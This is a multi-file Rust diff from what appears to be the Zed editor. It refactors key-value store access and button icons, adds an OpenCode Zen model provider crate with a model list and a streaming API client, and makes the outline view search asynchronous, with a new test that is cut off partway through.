- Divider, ParentElement as _, StatefulInteractiveElement, SwitchField, TintColor,
- ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip,
- prelude::*, rems_from_px,
+ Divider, StatefulInteractiveElement, SwitchField, TintColor, ToggleButtonGroup,
+ ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, prelude::*,
};
use vim_mode_setting::VimModeSetting;
@@ -477,8 +476,7 @@ fn render_setting_import_button(
.toggle_state(imported)
.tab_index(tab_index)
.when(imported, |this| {
- this.icon(IconName::Check)
- .icon_size(IconSize::Small)
+ this.end_icon(Icon::new(IconName::Check).size(IconSize::Small))
.color(Color::Success)
})
.on_click(move |_, window, cx| {
@@ -2,7 +2,7 @@ use std::collections::HashSet;
use std::sync::OnceLock;
use std::sync::atomic::{AtomicUsize, Ordering};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{App, EntityId, EventEmitter, Subscription};
use ui::{IconButtonShape, Tooltip, prelude::*};
use workspace::item::{ItemBufferKind, ItemEvent, ItemHandle};
@@ -35,10 +35,10 @@ impl MultibufferHint {
}
impl MultibufferHint {
- fn counter() -> &'static AtomicUsize {
+ fn counter(cx: &App) -> &'static AtomicUsize {
static SHOWN_COUNT: OnceLock<AtomicUsize> = OnceLock::new();
SHOWN_COUNT.get_or_init(|| {
- let value: usize = KEY_VALUE_STORE
+ let value: usize = KeyValueStore::global(cx)
.read_kvp(SHOWN_COUNT_KEY)
.ok()
.flatten()
@@ -49,19 +49,21 @@ impl MultibufferHint {
})
}
- fn shown_count() -> usize {
- Self::counter().load(Ordering::Relaxed)
+ fn shown_count(cx: &App) -> usize {
+ Self::counter(cx).load(Ordering::Relaxed)
}
fn increment_count(cx: &mut App) {
- Self::set_count(Self::shown_count() + 1, cx)
+ Self::set_count(Self::shown_count(cx) + 1, cx)
}
pub(crate) fn set_count(count: usize, cx: &mut App) {
- Self::counter().store(count, Ordering::Relaxed);
+ Self::counter(cx).store(count, Ordering::Relaxed);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count))
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count))
+ .await
});
}
@@ -71,7 +73,7 @@ impl MultibufferHint {
/// Determines the toolbar location for this [`MultibufferHint`].
fn determine_toolbar_location(&mut self, cx: &mut Context<Self>) -> ToolbarItemLocation {
- if Self::shown_count() >= NUMBER_OF_HINTS {
+ if Self::shown_count(cx) >= NUMBER_OF_HINTS {
return ToolbarItemLocation::Hidden;
}
@@ -158,10 +160,11 @@ impl Render for MultibufferHint {
)
.child(
Button::new("open_docs", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_event, _, cx| {
cx.open_url("https://zed.dev/docs/multibuffers")
}),
@@ -1,6 +1,6 @@
use crate::multibuffer_hint::MultibufferHint;
use client::{Client, UserStore, zed_urls};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use fs::Fs;
use gpui::{
Action, AnyElement, App, AppContext, AsyncWindowContext, Context, Entity, EventEmitter,
@@ -194,8 +194,10 @@ pub fn show_onboarding_view(app_state: Arc<AppState>, cx: &mut App) -> Task<anyh
cx.notify();
};
- db::write_and_log(cx, || {
- KEY_VALUE_STORE.write_kvp(FIRST_OPEN.to_string(), "false".to_string())
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(FIRST_OPEN.to_string(), "false".to_string())
+ .await
});
},
)
@@ -559,7 +561,7 @@ impl workspace::SerializableItem for Onboarding {
alive_items,
workspace_id,
"onboarding_pages",
- &persistence::ONBOARDING_PAGES,
+ &persistence::OnboardingPagesDb::global(cx),
cx,
)
}
@@ -572,10 +574,9 @@ impl workspace::SerializableItem for Onboarding {
window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<Entity<Self>>> {
+ let db = persistence::OnboardingPagesDb::global(cx);
window.spawn(cx, async move |cx| {
- if let Some(_) =
- persistence::ONBOARDING_PAGES.get_onboarding_page(item_id, workspace_id)?
- {
+ if let Some(_) = db.get_onboarding_page(item_id, workspace_id)? {
workspace.update(cx, |workspace, cx| Onboarding::new(workspace, cx))
} else {
Err(anyhow::anyhow!("No onboarding page to deserialize"))
@@ -593,11 +594,12 @@ impl workspace::SerializableItem for Onboarding {
) -> Option<gpui::Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::ONBOARDING_PAGES
- .save_onboarding_page(item_id, workspace_id)
- .await
- }))
+ let db = persistence::OnboardingPagesDb::global(cx);
+ Some(
+ cx.background_spawn(
+ async move { db.save_onboarding_page(item_id, workspace_id).await },
+ ),
+ )
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -646,7 +648,7 @@ mod persistence {
];
}
- db::static_connection!(ONBOARDING_PAGES, OnboardingPagesDb, [WorkspaceDb]);
+ db::static_connection!(OnboardingPagesDb, [WorkspaceDb]);
impl OnboardingPagesDb {
query! {
@@ -295,12 +295,27 @@ impl Model {
}
}
+#[derive(Debug, Serialize, Deserialize)]
+pub struct StreamOptions {
+ pub include_usage: bool,
+}
+
+impl Default for StreamOptions {
+ fn default() -> Self {
+ Self {
+ include_usage: true,
+ }
+ }
+}
+
#[derive(Debug, Serialize, Deserialize)]
pub struct Request {
pub model: String,
pub messages: Vec<RequestMessage>,
pub stream: bool,
#[serde(default, skip_serializing_if = "Option::is_none")]
+ pub stream_options: Option<StreamOptions>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
pub max_completion_tokens: Option<u64>,
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub stop: Vec<String>,
@@ -55,7 +55,14 @@ pub struct ResponseFunctionCallItem {
#[derive(Debug, Serialize, Deserialize)]
pub struct ResponseFunctionCallOutputItem {
pub call_id: String,
- pub output: String,
+ pub output: ResponseFunctionCallOutputContent,
+}
+
+#[derive(Debug, Serialize, Deserialize)]
+#[serde(untagged)]
+pub enum ResponseFunctionCallOutputContent {
+ List(Vec<ResponseInputContent>),
+ Text(String),
}
#[derive(Debug, Clone, Serialize, Deserialize)]
@@ -8,6 +8,7 @@ pub struct FileFinderSettings {
pub modal_max_width: FileFinderWidth,
pub skip_focus_for_active_in_search: bool,
pub include_ignored: Option<bool>,
+ pub include_channels: bool,
}
impl Settings for FileFinderSettings {
@@ -23,6 +24,7 @@ impl Settings for FileFinderSettings {
settings::IncludeIgnoredContent::Indexed => Some(false),
settings::IncludeIgnoredContent::Smart => None,
},
+ include_channels: file_finder.include_channels.unwrap(),
}
}
}
@@ -0,0 +1,27 @@
+[package]
+name = "opencode"
+version = "0.1.0"
+edition.workspace = true
+publish.workspace = true
+license = "GPL-3.0-or-later"
+
+[lints]
+workspace = true
+
+[lib]
+path = "src/opencode.rs"
+test = false
+
+[features]
+default = []
+schemars = ["dep:schemars"]
+
+[dependencies]
+anyhow.workspace = true
+futures.workspace = true
+google_ai.workspace = true
+http_client.workspace = true
+schemars = { workspace = true, optional = true }
+serde.workspace = true
+serde_json.workspace = true
+strum.workspace = true
@@ -0,0 +1 @@
+../../LICENSE-GPL
@@ -0,0 +1,453 @@
+use anyhow::{Result, anyhow};
+use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream};
+use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest};
+use serde::{Deserialize, Serialize};
+use strum::EnumIter;
+
+pub const OPENCODE_API_URL: &str = "https://opencode.ai/zen";
+
+#[derive(Clone, Copy, Debug, Default, PartialEq, Eq, Serialize, Deserialize)]
+#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
+#[serde(rename_all = "snake_case")]
+pub enum ApiProtocol {
+ #[default]
+ Anthropic,
+ OpenAiResponses,
+ OpenAiChat,
+ Google,
+}
+
+#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
+#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)]
+pub enum Model {
+ // -- Anthropic protocol models --
+ #[serde(rename = "claude-opus-4-6")]
+ ClaudeOpus4_6,
+ #[serde(rename = "claude-opus-4-5")]
+ ClaudeOpus4_5,
+ #[serde(rename = "claude-opus-4-1")]
+ ClaudeOpus4_1,
+ #[default]
+ #[serde(rename = "claude-sonnet-4-6")]
+ ClaudeSonnet4_6,
+ #[serde(rename = "claude-sonnet-4-5")]
+ ClaudeSonnet4_5,
+ #[serde(rename = "claude-sonnet-4")]
+ ClaudeSonnet4,
+ #[serde(rename = "claude-haiku-4-5")]
+ ClaudeHaiku4_5,
+ #[serde(rename = "claude-3-5-haiku")]
+ Claude3_5Haiku,
+
+ // -- OpenAI Responses API models --
+ #[serde(rename = "gpt-5.4")]
+ Gpt5_4,
+ #[serde(rename = "gpt-5.4-pro")]
+ Gpt5_4Pro,
+ #[serde(rename = "gpt-5.4-mini")]
+ Gpt5_4Mini,
+ #[serde(rename = "gpt-5.4-nano")]
+ Gpt5_4Nano,
+ #[serde(rename = "gpt-5.3-codex")]
+ Gpt5_3Codex,
+ #[serde(rename = "gpt-5.3-codex-spark")]
+ Gpt5_3Spark,
+ #[serde(rename = "gpt-5.2")]
+ Gpt5_2,
+ #[serde(rename = "gpt-5.2-codex")]
+ Gpt5_2Codex,
+ #[serde(rename = "gpt-5.1")]
+ Gpt5_1,
+ #[serde(rename = "gpt-5.1-codex")]
+ Gpt5_1Codex,
+ #[serde(rename = "gpt-5.1-codex-max")]
+ Gpt5_1CodexMax,
+ #[serde(rename = "gpt-5.1-codex-mini")]
+ Gpt5_1CodexMini,
+ #[serde(rename = "gpt-5")]
+ Gpt5,
+ #[serde(rename = "gpt-5-codex")]
+ Gpt5Codex,
+ #[serde(rename = "gpt-5-nano")]
+ Gpt5Nano,
+
+ // -- Google protocol models --
+ #[serde(rename = "gemini-3.1-pro")]
+ Gemini3_1Pro,
+ #[serde(rename = "gemini-3-flash")]
+ Gemini3Flash,
+
+ // -- OpenAI Chat Completions protocol models --
+ #[serde(rename = "minimax-m2.5")]
+ MiniMaxM2_5,
+ #[serde(rename = "minimax-m2.5-free")]
+ MiniMaxM2_5Free,
+ #[serde(rename = "glm-5")]
+ Glm5,
+ #[serde(rename = "kimi-k2.5")]
+ KimiK2_5,
+ #[serde(rename = "mimo-v2-pro-free")]
+ MimoV2ProFree,
+ #[serde(rename = "mimo-v2-omni-free")]
+ MimoV2OmniFree,
+ #[serde(rename = "mimo-v2-flash-free")]
+ MimoV2FlashFree,
+ #[serde(rename = "trinity-large-preview-free")]
+ TrinityLargePreviewFree,
+ #[serde(rename = "big-pickle")]
+ BigPickle,
+ #[serde(rename = "nemotron-3-super-free")]
+ Nemotron3SuperFree,
+
+ // -- Custom model --
+ #[serde(rename = "custom")]
+ Custom {
+ name: String,
+ display_name: Option<String>,
+ max_tokens: u64,
+ max_output_tokens: Option<u64>,
+ protocol: ApiProtocol,
+ },
+}
+
+impl Model {
+ pub fn default_fast() -> Self {
+ Self::ClaudeHaiku4_5
+ }
+
+ pub fn id(&self) -> &str {
+ match self {
+ Self::ClaudeOpus4_6 => "claude-opus-4-6",
+ Self::ClaudeOpus4_5 => "claude-opus-4-5",
+ Self::ClaudeOpus4_1 => "claude-opus-4-1",
+ Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
+ Self::ClaudeSonnet4_5 => "claude-sonnet-4-5",
+ Self::ClaudeSonnet4 => "claude-sonnet-4",
+ Self::ClaudeHaiku4_5 => "claude-haiku-4-5",
+ Self::Claude3_5Haiku => "claude-3-5-haiku",
+
+ Self::Gpt5_4 => "gpt-5.4",
+ Self::Gpt5_4Pro => "gpt-5.4-pro",
+ Self::Gpt5_4Mini => "gpt-5.4-mini",
+ Self::Gpt5_4Nano => "gpt-5.4-nano",
+ Self::Gpt5_3Codex => "gpt-5.3-codex",
+ Self::Gpt5_3Spark => "gpt-5.3-codex-spark",
+ Self::Gpt5_2 => "gpt-5.2",
+ Self::Gpt5_2Codex => "gpt-5.2-codex",
+ Self::Gpt5_1 => "gpt-5.1",
+ Self::Gpt5_1Codex => "gpt-5.1-codex",
+ Self::Gpt5_1CodexMax => "gpt-5.1-codex-max",
+ Self::Gpt5_1CodexMini => "gpt-5.1-codex-mini",
+ Self::Gpt5 => "gpt-5",
+ Self::Gpt5Codex => "gpt-5-codex",
+ Self::Gpt5Nano => "gpt-5-nano",
+
+ Self::Gemini3_1Pro => "gemini-3.1-pro",
+ Self::Gemini3Flash => "gemini-3-flash",
+
+ Self::MiniMaxM2_5 => "minimax-m2.5",
+ Self::MiniMaxM2_5Free => "minimax-m2.5-free",
+ Self::Glm5 => "glm-5",
+ Self::KimiK2_5 => "kimi-k2.5",
+ Self::MimoV2ProFree => "mimo-v2-pro-free",
+ Self::MimoV2OmniFree => "mimo-v2-omni-free",
+ Self::MimoV2FlashFree => "mimo-v2-flash-free",
+ Self::TrinityLargePreviewFree => "trinity-large-preview-free",
+ Self::BigPickle => "big-pickle",
+ Self::Nemotron3SuperFree => "nemotron-3-super-free",
+
+ Self::Custom { name, .. } => name,
+ }
+ }
+
+ pub fn display_name(&self) -> &str {
+ match self {
+ Self::ClaudeOpus4_6 => "Claude Opus 4.6",
+ Self::ClaudeOpus4_5 => "Claude Opus 4.5",
+ Self::ClaudeOpus4_1 => "Claude Opus 4.1",
+ Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
+ Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
+ Self::ClaudeSonnet4 => "Claude Sonnet 4",
+ Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
+ Self::Claude3_5Haiku => "Claude Haiku 3.5",
+
+ Self::Gpt5_4 => "GPT 5.4",
+ Self::Gpt5_4Pro => "GPT 5.4 Pro",
+ Self::Gpt5_4Mini => "GPT 5.4 Mini",
+ Self::Gpt5_4Nano => "GPT 5.4 Nano",
+ Self::Gpt5_3Codex => "GPT 5.3 Codex",
+ Self::Gpt5_3Spark => "GPT 5.3 Codex Spark",
+ Self::Gpt5_2 => "GPT 5.2",
+ Self::Gpt5_2Codex => "GPT 5.2 Codex",
+ Self::Gpt5_1 => "GPT 5.1",
+ Self::Gpt5_1Codex => "GPT 5.1 Codex",
+ Self::Gpt5_1CodexMax => "GPT 5.1 Codex Max",
+ Self::Gpt5_1CodexMini => "GPT 5.1 Codex Mini",
+ Self::Gpt5 => "GPT 5",
+ Self::Gpt5Codex => "GPT 5 Codex",
+ Self::Gpt5Nano => "GPT 5 Nano",
+
+ Self::Gemini3_1Pro => "Gemini 3.1 Pro",
+ Self::Gemini3Flash => "Gemini 3 Flash",
+
+ Self::MiniMaxM2_5 => "MiniMax M2.5",
+ Self::MiniMaxM2_5Free => "MiniMax M2.5 Free",
+ Self::Glm5 => "GLM 5",
+ Self::KimiK2_5 => "Kimi K2.5",
+ Self::MimoV2ProFree => "MiMo V2 Pro Free",
+ Self::MimoV2OmniFree => "MiMo V2 Omni Free",
+ Self::MimoV2FlashFree => "MiMo V2 Flash Free",
+ Self::TrinityLargePreviewFree => "Trinity Large Preview Free",
+ Self::BigPickle => "Big Pickle",
+ Self::Nemotron3SuperFree => "Nemotron 3 Super Free",
+
+ Self::Custom {
+ name, display_name, ..
+ } => display_name.as_deref().unwrap_or(name),
+ }
+ }
+
+ pub fn protocol(&self) -> ApiProtocol {
+ match self {
+ Self::ClaudeOpus4_6
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeSonnet4_6
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeHaiku4_5
+ | Self::Claude3_5Haiku => ApiProtocol::Anthropic,
+
+ Self::Gpt5_4
+ | Self::Gpt5_4Pro
+ | Self::Gpt5_4Mini
+ | Self::Gpt5_4Nano
+ | Self::Gpt5_3Codex
+ | Self::Gpt5_3Spark
+ | Self::Gpt5_2
+ | Self::Gpt5_2Codex
+ | Self::Gpt5_1
+ | Self::Gpt5_1Codex
+ | Self::Gpt5_1CodexMax
+ | Self::Gpt5_1CodexMini
+ | Self::Gpt5
+ | Self::Gpt5Codex
+ | Self::Gpt5Nano => ApiProtocol::OpenAiResponses,
+
+ Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google,
+
+ Self::MiniMaxM2_5
+ | Self::MiniMaxM2_5Free
+ | Self::Glm5
+ | Self::KimiK2_5
+ | Self::MimoV2ProFree
+ | Self::MimoV2OmniFree
+ | Self::MimoV2FlashFree
+ | Self::TrinityLargePreviewFree
+ | Self::BigPickle
+ | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat,
+
+ Self::Custom { protocol, .. } => *protocol,
+ }
+ }
+
+ pub fn max_token_count(&self) -> u64 {
+ match self {
+ // Anthropic models
+ Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000,
+ Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000,
+ Self::ClaudeOpus4_1 => 200_000,
+ Self::ClaudeHaiku4_5 => 200_000,
+ Self::Claude3_5Haiku => 200_000,
+
+ // OpenAI models
+ Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000,
+ Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000,
+ Self::Gpt5_3Codex => 400_000,
+ Self::Gpt5_3Spark => 128_000,
+ Self::Gpt5_2 | Self::Gpt5_2Codex => 400_000,
+ Self::Gpt5_1 | Self::Gpt5_1Codex | Self::Gpt5_1CodexMax | Self::Gpt5_1CodexMini => {
+ 400_000
+ }
+ Self::Gpt5 | Self::Gpt5Codex | Self::Gpt5Nano => 400_000,
+
+ // Google models
+ Self::Gemini3_1Pro => 1_048_576,
+ Self::Gemini3Flash => 1_048_576,
+
+ // OpenAI-compatible models
+ Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608,
+ Self::Glm5 => 200_000,
+ Self::KimiK2_5 => 262_144,
+ Self::MimoV2ProFree => 1_048_576,
+ Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144,
+ Self::TrinityLargePreviewFree => 131_072,
+ Self::BigPickle => 200_000,
+ Self::Nemotron3SuperFree => 262_144,
+
+ Self::Custom { max_tokens, .. } => *max_tokens,
+ }
+ }
+
+ pub fn max_output_tokens(&self) -> Option<u64> {
+ match self {
+ // Anthropic models
+ Self::ClaudeOpus4_6 => Some(128_000),
+ Self::ClaudeSonnet4_6 => Some(64_000),
+ Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeHaiku4_5 => Some(64_000),
+ Self::Claude3_5Haiku => Some(8_192),
+
+ // OpenAI models
+ Self::Gpt5_4
+ | Self::Gpt5_4Pro
+ | Self::Gpt5_4Mini
+ | Self::Gpt5_4Nano
+ | Self::Gpt5_3Codex
+ | Self::Gpt5_3Spark
+ | Self::Gpt5_2
+ | Self::Gpt5_2Codex
+ | Self::Gpt5_1
+ | Self::Gpt5_1Codex
+ | Self::Gpt5_1CodexMax
+ | Self::Gpt5_1CodexMini
+ | Self::Gpt5
+ | Self::Gpt5Codex
+ | Self::Gpt5Nano => Some(128_000),
+
+ // Google models
+ Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536),
+
+ // OpenAI-compatible models
+ Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536),
+ Self::Glm5 | Self::BigPickle => Some(128_000),
+ Self::KimiK2_5 => Some(65_536),
+ Self::MimoV2ProFree => Some(131_072),
+ Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536),
+ Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384),
+
+ Self::Custom {
+ max_output_tokens, ..
+ } => *max_output_tokens,
+ }
+ }
+
+ pub fn supports_tools(&self) -> bool {
+ true
+ }
+
+ pub fn supports_images(&self) -> bool {
+ match self {
+ // Anthropic models support images
+ Self::ClaudeOpus4_6
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeSonnet4_6
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeHaiku4_5
+ | Self::Claude3_5Haiku => true,
+
+ // OpenAI models support images
+ Self::Gpt5_4
+ | Self::Gpt5_4Pro
+ | Self::Gpt5_4Mini
+ | Self::Gpt5_4Nano
+ | Self::Gpt5_3Codex
+ | Self::Gpt5_3Spark
+ | Self::Gpt5_2
+ | Self::Gpt5_2Codex
+ | Self::Gpt5_1
+ | Self::Gpt5_1Codex
+ | Self::Gpt5_1CodexMax
+ | Self::Gpt5_1CodexMini
+ | Self::Gpt5
+ | Self::Gpt5Codex
+ | Self::Gpt5Nano => true,
+
+ // Google models support images
+ Self::Gemini3_1Pro | Self::Gemini3Flash => true,
+
+ // OpenAI-compatible models — conservative default
+ Self::MiniMaxM2_5
+ | Self::MiniMaxM2_5Free
+ | Self::Glm5
+ | Self::KimiK2_5
+ | Self::MimoV2ProFree
+ | Self::MimoV2OmniFree
+ | Self::MimoV2FlashFree
+ | Self::TrinityLargePreviewFree
+ | Self::BigPickle
+ | Self::Nemotron3SuperFree => false,
+
+ Self::Custom { protocol, .. } => matches!(
+ protocol,
+ ApiProtocol::Anthropic
+ | ApiProtocol::OpenAiResponses
+ | ApiProtocol::OpenAiChat
+ | ApiProtocol::Google
+ ),
+ }
+ }
+}
+
+/// Stream generate content for Google models via OpenCode Zen.
+///
+/// Unlike `google_ai::stream_generate_content()`, this uses:
+/// - `/v1/models/{model}` path (not `/v1beta/models/{model}`)
+/// - `Authorization: Bearer` header (not `key=` query param)
+pub async fn stream_generate_content_zen(
+ client: &dyn HttpClient,
+ api_url: &str,
+ api_key: &str,
+ request: google_ai::GenerateContentRequest,
+) -> Result<BoxStream<'static, Result<google_ai::GenerateContentResponse>>> {
+ let api_key = api_key.trim();
+
+ let model_id = &request.model.model_id;
+
+ let uri = format!("{api_url}/v1/models/{model_id}:streamGenerateContent?alt=sse");
+
+ let request_builder = HttpRequest::builder()
+ .method(Method::POST)
+ .uri(uri)
+ .header("Content-Type", "application/json")
+ .header("Authorization", format!("Bearer {api_key}"));
+
+ let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?;
+ let mut response = client.send(request).await?;
+ if response.status().is_success() {
+ let reader = BufReader::new(response.into_body());
+ Ok(reader
+ .lines()
+ .filter_map(|line| async move {
+ match line {
+ Ok(line) => {
+ if let Some(line) = line.strip_prefix("data: ") {
+ match serde_json::from_str(line) {
+ Ok(response) => Some(Ok(response)),
+ Err(error) => {
+ Some(Err(anyhow!("Error parsing JSON: {error:?}\n{line:?}")))
+ }
+ }
+ } else {
+ None
+ }
+ }
+ Err(error) => Some(Err(anyhow!(error))),
+ }
+ })
+ .boxed())
+ } else {
+ let mut text = String::new();
+ response.body_mut().read_to_string(&mut text).await?;
+ Err(anyhow!(
+ "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}",
+ response.status(),
+ text
+ ))
+ }
+}
@@ -1,8 +1,5 @@
use std::ops::Range;
-use std::{
- cmp::{self, Reverse},
- sync::Arc,
-};
+use std::{cmp, sync::Arc};
use editor::scroll::ScrollOffset;
use editor::{Anchor, AnchorRangeExt, Editor, scroll::Autoscroll};
@@ -183,11 +180,10 @@ impl OutlineView {
struct OutlineViewDelegate {
outline_view: WeakEntity<OutlineView>,
active_editor: Entity<Editor>,
- outline: Outline<Anchor>,
+ outline: Arc<Outline<Anchor>>,
selected_match_index: usize,
prev_scroll_position: Option<Point<ScrollOffset>>,
matches: Vec<StringMatch>,
- last_query: String,
}
enum OutlineRowHighlights {}
@@ -202,12 +198,11 @@ impl OutlineViewDelegate {
) -> Self {
Self {
outline_view,
- last_query: Default::default(),
matches: Default::default(),
selected_match_index: 0,
prev_scroll_position: Some(editor.update(cx, |editor, cx| editor.scroll_position(cx))),
active_editor: editor,
- outline,
+ outline: Arc::new(outline),
}
}
@@ -280,67 +275,73 @@ impl PickerDelegate for OutlineViewDelegate {
window: &mut Window,
cx: &mut Context<Picker<OutlineViewDelegate>>,
) -> Task<()> {
- let selected_index;
- if query.is_empty() {
+ let is_query_empty = query.is_empty();
+ if is_query_empty {
self.restore_active_editor(window, cx);
- self.matches = self
- .outline
- .items
- .iter()
- .enumerate()
- .map(|(index, _)| StringMatch {
- candidate_id: index,
- score: Default::default(),
- positions: Default::default(),
- string: Default::default(),
- })
- .collect();
-
- let (buffer, cursor_offset) = self.active_editor.update(cx, |editor, cx| {
- let buffer = editor.buffer().read(cx).snapshot(cx);
- let cursor_offset = editor
- .selections
- .newest::<MultiBufferOffset>(&editor.display_snapshot(cx))
- .head();
- (buffer, cursor_offset)
- });
- selected_index = self
- .outline
- .items
- .iter()
- .enumerate()
- .map(|(ix, item)| {
- let range = item.range.to_offset(&buffer);
- let distance_to_closest_endpoint = cmp::min(
- (range.start.0 as isize - cursor_offset.0 as isize).abs(),
- (range.end.0 as isize - cursor_offset.0 as isize).abs(),
- );
- let depth = if range.contains(&cursor_offset) {
- Some(item.depth)
- } else {
- None
- };
- (ix, depth, distance_to_closest_endpoint)
- })
- .max_by_key(|(_, depth, distance)| (*depth, Reverse(*distance)))
- .map(|(ix, _, _)| ix)
- .unwrap_or(0);
- } else {
- self.matches = smol::block_on(
- self.outline
- .search(&query, cx.background_executor().clone()),
- );
- selected_index = self
- .matches
- .iter()
- .enumerate()
- .max_by_key(|(_, m)| OrderedFloat(m.score))
- .map(|(ix, _)| ix)
- .unwrap_or(0);
}
- self.last_query = query;
- self.set_selected_index(selected_index, !self.last_query.is_empty(), cx);
- Task::ready(())
+
+ let outline = self.outline.clone();
+ cx.spawn_in(window, async move |this, cx| {
+ let matches = if is_query_empty {
+ outline
+ .items
+ .iter()
+ .enumerate()
+ .map(|(index, _)| StringMatch {
+ candidate_id: index,
+ score: Default::default(),
+ positions: Default::default(),
+ string: Default::default(),
+ })
+ .collect()
+ } else {
+ outline
+ .search(&query, cx.background_executor().clone())
+ .await
+ };
+
+ let _ = this.update(cx, |this, cx| {
+ this.delegate.matches = matches;
+ let selected_index = if is_query_empty {
+ let (buffer, cursor_offset) =
+ this.delegate.active_editor.update(cx, |editor, cx| {
+ let snapshot = editor.display_snapshot(cx);
+ let cursor_offset = editor
+ .selections
+ .newest::<MultiBufferOffset>(&snapshot)
+ .head();
+ (snapshot.buffer().clone(), cursor_offset)
+ });
+ this.delegate
+ .matches
+ .iter()
+ .enumerate()
+ .filter_map(|(ix, m)| {
+ let item = &this.delegate.outline.items[m.candidate_id];
+ let range = item.range.to_offset(&buffer);
+ range.contains(&cursor_offset).then_some((ix, item.depth))
+ })
+ .max_by_key(|(ix, depth)| (*depth, cmp::Reverse(*ix)))
+ .map(|(ix, _)| ix)
+ .unwrap_or(0)
+ } else {
+ this.delegate
+ .matches
+ .iter()
+ .enumerate()
+ .max_by(|(ix_a, a), (ix_b, b)| {
+ OrderedFloat(a.score)
+ .cmp(&OrderedFloat(b.score))
+ .then(ix_b.cmp(ix_a))
+ })
+ .map(|(ix, _)| ix)
+ .unwrap_or(0)
+ };
+
+ this.delegate
+ .set_selected_index(selected_index, !is_query_empty, cx);
+ });
+ })
}
fn confirm(
@@ -586,6 +587,246 @@ mod tests {
assert_single_caret_at_row(&editor, expected_first_highlighted_row, cx);
}
+ #[gpui::test]
+ async fn test_outline_empty_query_prefers_deepest_containing_symbol_else_first(
+ cx: &mut TestAppContext,
+ ) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "a.rs": indoc! {"
+ // display line 0
+ struct Outer { // display line 1
+ fn top(&self) {// display line 2
+ let _x = 1;// display line 3
+ } // display line 4
+ } // display line 5
+
+ struct Another; // display line 7
+ "}
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+ project.read_with(cx, |project, _| {
+ project.languages().add(language::rust_lang())
+ });
+
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+
+ let workspace = cx.read(|cx| workspace.read(cx).workspace().clone());
+ let worktree_id = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ project.worktrees(cx).next().unwrap().read(cx).id()
+ })
+ });
+ let _buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+ let editor = workspace
+ .update_in(cx, |workspace, window, cx| {
+ workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx)
+ })
+ .await
+ .unwrap()
+ .downcast::<Editor>()
+ .unwrap();
+
+ set_single_caret_at_row(&editor, 3, cx);
+ let outline_view = open_outline_view(&workspace, cx);
+ cx.run_until_parked();
+ let (selected_candidate_id, expected_deepest_containing_candidate_id) = outline_view
+ .update(cx, |outline_view, cx| {
+ let delegate = &outline_view.delegate;
+ let selected_candidate_id =
+ delegate.matches[delegate.selected_match_index].candidate_id;
+ let (buffer, cursor_offset) = delegate.active_editor.update(cx, |editor, cx| {
+ let buffer = editor.buffer().read(cx).snapshot(cx);
+ let cursor_offset = editor
+ .selections
+ .newest::<MultiBufferOffset>(&editor.display_snapshot(cx))
+ .head();
+ (buffer, cursor_offset)
